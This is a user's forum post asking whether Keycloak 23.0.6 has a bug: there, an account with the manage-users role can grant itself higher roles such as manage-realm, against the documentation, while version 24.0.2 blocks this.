Hi,
I’m seeing behavior in Keycloak 23.0.6 that seems to contradict the documentation where it states the following:
Admins with the manage-users
role will only be able to assign admin roles to users that they themselves have. So, if an admin has the manage-users
role but doesn’t have the manage-realm
role, they will not be able to assign this role.
I’ve been testing this behavior out and found that if I assign ‘manage-users’ role to user SupportUser (where SupportUser has these roles:
manage-users
query-groups
query-users
view-users )
SupportUser is able to assign themselves higher permissioned roles like manage-realm. Keycloak 24.0.2 functions as I would expect (blocks a user from assigning a role greater than a role they themselves have). I wanted to check and see if this is a known issue with 23.0.6 that was in fact fixed OR if there is something wrong with our current 23.0.6 deployment. We will likely be upgrading anyways but I am hoping to get a definitive answer as to whether this was a bug.
Thanks,
Walter